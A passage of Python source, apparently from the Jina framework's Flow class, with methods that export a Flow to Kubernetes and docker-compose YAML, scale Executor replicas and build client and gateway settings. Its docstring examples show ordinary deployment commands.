self._pod_nodes[pod_name].rolling_update,
uses_with=uses_with,
any_event_loop=True,
)
def to_k8s_yaml(
self,
output_base_path: str,
k8s_namespace: Optional[str] = None,
k8s_connection_pool: bool = True,
):
"""
Converts the Flow into a set of yaml deployments to deploy in Kubernetes
:param output_base_path: The base path where to dump all the yaml files
:param k8s_namespace: The name of the k8s namespace to set for the configurations. If None, the name of the Flow will be used.
:param k8s_connection_pool: Boolean indicating whether the kubernetes connection pool should be used inside the Executor Runtimes.
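Example, a sketch that dumps one folder of YAML files per Pod (the output path, namespace and Hub name are hypothetical):
.. highlight:: python
.. code-block:: python
from jina import Flow
f = Flow().add(name='encoder', uses='jinahub+docker://MyHubExecutor')
f.to_k8s_yaml('./k8s_flow', k8s_namespace='my-namespace')
# then deploy with: kubectl apply -R -f ./k8s_flow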
"""
import yaml
if self._build_level.value < FlowBuildLevel.GRAPH.value:
self.build(copy_flow=False)
from jina.orchestrate.pods.config.k8s import K8sPodConfig
k8s_namespace = k8s_namespace or self.args.name or 'default'
for node, v in self._pod_nodes.items():
pod_base = os.path.join(output_base_path, node)
k8s_pod = K8sPodConfig(
args=v.args,
k8s_namespace=k8s_namespace,
k8s_connection_pool=k8s_connection_pool,
k8s_pod_addresses=self._get_k8s_pod_addresses(k8s_namespace)
if (node == 'gateway' and not k8s_connection_pool)
else None,
)
configs = k8s_pod.to_k8s_yaml()
for name, k8s_objects in configs:
filename = os.path.join(pod_base, f'{name}.yml')
os.makedirs(pod_base, exist_ok=True)
with open(filename, 'w+') as fp:
for i, k8s_object in enumerate(k8s_objects):
yaml.dump(k8s_object, fp)
if i < len(k8s_objects) - 1:
fp.write('---\n')
def to_docker_compose_yaml(
self, output_path: Optional[str] = None, network_name: Optional[str] = None
):
"""
Converts the Flow into a yaml file to run with `docker-compose up`
:param output_path: The output path for the yaml file
:param network_name: The name of the network that will be used by the deployment
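Example, a sketch (the output file, network name and Hub name are hypothetical):
.. highlight:: python
.. code-block:: python
from jina import Flow
f = Flow().add(name='encoder', uses='jinahub+docker://MyHubExecutor')
f.to_docker_compose_yaml(output_path='my-compose.yml', network_name='my-network')
# then run with: docker-compose -f my-compose.yml up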
"""
import yaml
if self._build_level.value < FlowBuildLevel.GRAPH.value:
self.build(copy_flow=False)
output_path = output_path or 'docker-compose.yml'
network_name = network_name or 'jina-network'
from jina.orchestrate.pods.config.docker_compose import DockerComposeConfig
docker_compose_dict = {
'version': '3.3',
'networks': {network_name: {'driver': 'bridge'}},
}
services = {}
for node, v in self._pod_nodes.items():
docker_compose_pod = DockerComposeConfig(
args=v.args,
pod_addresses=self._get_docker_compose_pod_addresses(),
)
service_configs = docker_compose_pod.to_docker_compose_config()
for service_name, service in service_configs:
service['networks'] = [network_name]
services[service_name] = service
docker_compose_dict['services'] = services
with open(output_path, 'w+') as fp:
yaml.dump(docker_compose_dict, fp, sort_keys=False)
def scale(
self,
pod_name: str,
replicas: int,
):
"""
Scale the number of replicas of a given Executor.
:param pod_name: pod to update
:param replicas: The number of replicas to scale to
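Example, a sketch of scaling a running Pod (the Pod name and replica counts are hypothetical):
.. highlight:: python
.. code-block:: python
from jina import Flow
f = Flow().add(name='encoder', replicas=2)
with f:
    f.scale(pod_name='encoder', replicas=4)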
"""
# TODO when replicas-host is ready, needs to be passed here
from jina.helper import run_async
run_async(
self._pod_nodes[pod_name].scale,
replicas=replicas,
any_event_loop=True,
)
@property
def client_args(self) -> argparse.Namespace:
"""Get Client settings.
# noqa: DAR201
"""
if 'port_expose' in self._common_kwargs:
kwargs = copy.deepcopy(self._common_kwargs)
kwargs['port'] = self._common_kwargs['port_expose']
return ArgNamespace.kwargs2namespace(kwargs, set_client_cli_parser())
@property
def gateway_args(self) -> argparse.Namespace:
"""Get Gateway settings.
# noqa: DAR201
"""
return ArgNamespace.kwargs2namespace(self._common_kwargs, set_gateway_parser())
def update_network_interface(self, **kwargs):
"""Update the network interface of this Flow (affects Gateway & Client)
:param kwargs: new network settings
"""
self._common_kwargs.update(kwargs)